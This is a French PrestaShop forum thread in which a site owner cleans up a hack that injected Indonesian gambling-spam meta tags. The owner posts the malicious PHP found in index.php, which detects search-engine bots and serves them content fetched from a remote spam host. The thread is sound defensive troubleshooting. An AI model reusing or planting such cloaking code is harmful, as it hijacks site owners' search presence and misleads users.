Jump to content

Piratage et injonction de virus malveillant


Recommended Posts

Bonsoir à tous,

Je gère un site web PrestaShop hébergé chez LWS et récemment, il a été piraté. J'ai découvert des métadonnées indésirables dans l'en-tête de la page d'accueil de mon site. Des mots comme "SAPITOTO" et des phrases en indonésien apparaissent dans les balises meta, ce qui indique que le site a été compromis par des hackers. Voici un extrait du code affecté :

<!DOCTYPE html> <html ="" lang="id" amp="" i-amphtml-binding="" i-amphtml-layout="" i-amphtml-no-boilerplate="" transformed="self;v=1" itemscope="itemscope" itemtype="https://schema.org/WebPage" amp-version="2406071948000" class="i-amphtml-singledoc i-amphtml-standalone"><head> <meta name="viewport" content="width=device-width,initial-scale=1"> <title>SAPITOTO 10 Bandar Situs Toto 4d Dan Togel Online Resmi Jaya No 1 Indonesia</title> <meta name="description" content="Temukan pengalaman bermain Toto 4D dan togel online terbaik di SAPITOTO 10 Bandar Situs Toto 4d Dan Togel Online Jaya Resmi No 1 Indonesia." /> <meta name="keywords" content="situs toto, situs toto resmi, situs toto jaya, situs toto 4d, situs toto 4d resmi, togel online, togel online 4d, situs togel, togel online resmi, situs togel jaya, sapitoto" /> <meta name="page google.com" content="https://www.google.com/search?q=sapi+toto"> <meta name="page google.co.id" content="https://www.google.co.id/search?q=sapi+toto"> <meta name="page google.com" content="https://www.google.com/search?q=sapitoto"> <meta name="page google.co.id" content="https://www.google.co.id/search?q=sapitoto"> <link itemprop="mainEntityOfPage" rel="canonical" href="https://urbanart.ma/" /> <link rel="amphtml" href="https://pub-65759e4fd0324f7680a0a3913203d631.r2.dev/urbanart.html" />

urbanart.ma est le nom de domaine. Il me semble que les pirates sont des indonisiens. J'ai essayé de retrouver les traces des pirates dans les fichiers de mon site en effectuant des recherches de mot clé comme "SAPITOTO" mais ça n'a donné aucun résultat. Donc je ne sais plus à quel moment exactement ces scripts sont injectés le code de la page indexée.

J'aimerais obtenir des conseils sur la manière de nettoyer complètement ces données indésirables de mon site et de renforcer la sécurité pour éviter de futures intrusions.

Merci d'avance pour votre aide!

Link to comment
Share on other sites

Mouais, alors perso je ne suis pas du tout fan du module PrestaScan Security qui n'est pas transparent du tout, a un accès total à la boutique et à la base de données et envoie les infos chez profileo.

Link to comment
Share on other sites

Posted (edited)
3 hours ago, Eolia said:

Salut merci pour votre réponse ! 

J'ai essayé mais on me demande toujours d'augmenter la taille de la mémoire sur le serveur d'au minimum 512M je ne sais pas pourquoi. Vous avez une idée de comment pourrais-je s'en passer de ça ? 

Edited by IBB (see edit history)
Link to comment
Share on other sites

Il y a 15 heures, IBB a dit :

Salut merci pour votre réponse ! 

J'ai essayé mais on me demande toujours d'augmenter la taille de la mémoire sur le serveur d'au minimum 512M je ne sais pas pourquoi. Vous avez une idée de comment pourrais-je s'en passer de ça ? 

Dans les paramètres de votre hébergement si vous pouvez augmenter la mémoire disponible.

 

Il y a 15 heures, IBB a dit :

Abbon!? Donc c'est partout alors 🤔

Leurs virus est très puissant quand même j'avoue. 

Ce ne sont pas des virus mais des scripts et il n'y en a pas qu'un mais des milliers. Tous les sites web se font attaquer en permanence.

Link to comment
Share on other sites

Quand j'ai lancé le script cleaner.php, il m'a fait savoir que le fichier index.php coeur de mon site contenait un script php qui n'était pas dans la version d'origine. Et effectivement, j'y suis allé jeter un coup d'oeil, je vois un script php qui  contenait ce code ci-dessous tout au début du fchier avant même les commentaires prestashop:

function is_bot() {

    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');

    foreach ($bots as $bot) {

        if (stripos($user_agent, $bot) !== false) {

            return true;

        }

    }

    return false;

}

if (is_bot()) {

    $message = file_get_contents('https://seoleveling.org/CLOAKING/urbanart.ma.txt');#NAROLINK

    echo $message;

}

Avant quand demandais une réindexation et explore la page trouvée, je voyais tas d'informations des pirates et même l'en-tête de la était carrément modifié. Mais maintenant que j'ai mis à jour le fichier index.php et demander à nouveau une réindexation, tous ces blablas n'y sont plus !

Un grand merci à vous tous !!!

Link to comment
Share on other sites

il y a une heure, Eolia a dit :

Celui-là est très bien mais ne check que les modules connus pour avoir des failles.

Tout à fait, il vient en complément de ton script, c'est une évidence.

Nettoyer un hack, n'est pas simplement remettre les fichiers d'origine, je suis abasourdie par certains professionnels qui ne font rien de plus.

L'accumulation de solution peut aider à optimiser les informations.

Link to comment
Share on other sites

il y a 55 minutes, IBB a dit :

Quand j'ai lancé le script cleaner.php, il m'a fait savoir que le fichier index.php coeur de mon site contenait un script php qui n'était pas dans la version d'origine. Et effectivement, j'y suis allé jeter un coup d'oeil, je vois un script php qui  contenait ce code ci-dessous tout au début du fchier avant même les commentaires prestashop:

function is_bot() {

    $user_agent = $_SERVER['HTTP_USER_AGENT'];

    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');

    foreach ($bots as $bot) {

        if (stripos($user_agent, $bot) !== false) {

            return true;

        }

    }

    return false;

}

if (is_bot()) {

    $message = file_get_contents('https://seoleveling.org/CLOAKING/urbanart.ma.txt');#NAROLINK

    echo $message;

}

Avant quand demandais une réindexation et explore la page trouvée, je voyais tas d'informations des pirates et même l'en-tête de la était carrément modifié. Mais maintenant que j'ai mis à jour le fichier index.php et demander à nouveau une réindexation, tous ces blablas n'y sont plus !

Un grand merci à vous tous !!!

Ce qu'il faut savoir c'est que ce code n'est pas arrivé tout seul donc bien regarder la liste des modules inscrit comme contenant des fonctions sensibles et les supprimer (si vous ne les utilisez pas) ou les mettre à jour au plus vite.

Link to comment
Share on other sites

1 hour ago, Eolia said:

Ce qu'il faut savoir c'est que ce code n'est pas arrivé tout seul donc bien regarder la liste des modules inscrit comme contenant des fonctions sensibles et les supprimer (si vous ne les utilisez pas) ou les mettre à jour au plus vite.

Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. 

Link to comment
Share on other sites

il y a 16 minutes, IBB a dit :

Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. 

Il faut analyser le code et savoir s'il y a un risque ou non.

Link to comment
Share on other sites

il y a 36 minutes, IBB a dit :

Le problème est qu'il y en a tellement que si je décide de tout supprimer j'ai peur que cela n'endommage tout le système. 

Vous ne supprimez, depuis le BO => pages Modules, UNIQUEMENT les modules que vous n'utilisez pas ou qui sont désactivés ou non-configurés

Link to comment
Share on other sites

23 hours ago, Eolia said:

Vous ne supprimez, depuis le BO => pages Modules, UNIQUEMENT les modules que vous n'utilisez pas ou qui sont désactivés ou non-configurés

OKay d'accord. Mais jusque là c'est leur logo qui refuse de céder. Pourtant le lien qui inclut le logo pointe vers le mien. Avez-vous une solution pour se débarrasser ? 

Link to comment
Share on other sites

Il y a 3 heures, IBB a dit :

OKay d'accord. Mais jusque là c'est leur logo qui refuse de céder. Pourtant le lien qui inclut le logo pointe vers le mien. Avez-vous une solution pour se débarrasser ? 

De quoi parlez-vous ? Quel logo, qui refuse de céder quoi ?

Link to comment
Share on other sites

Quand ils ont piratés, ils ont carrément changé le logo de mon site en le remplaçant par le leur. Et même après que j'aie nettoyé leur traces le logo reste toujours. Voici en image de quoi je parle

urban.thumb.png.100b0d8f42238eb1d961ac8fc57e5cf5.png

Pourtant le lien vers mon logo est bien defini dans l'en-tête de la page comme vous pouvez le voir en image.

 

logo_cpy.png.e8e4a37d7e6cb2810ade4689a0ca809b.png

Link to comment
Share on other sites

32 minutes ago, Eolia said:

Relancez le sitemap et demandez à Google de ré-indexer

Oui j'avais déjà effectué tout ça mais malgré tout ça persiste toujours. Pourtant le changement a été effectué sur mobile. Mais sur PC pas encore 

Link to comment
Share on other sites

1 hour ago, Eolia said:

L'index Google est mobile first il a donc indexé les pages en vue mobile en premier, la vue desktop va suivre.

OKay donc je dois continuer à attendre jusqu'à ce que le moteur Google indexe sur Desktop aussi 

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...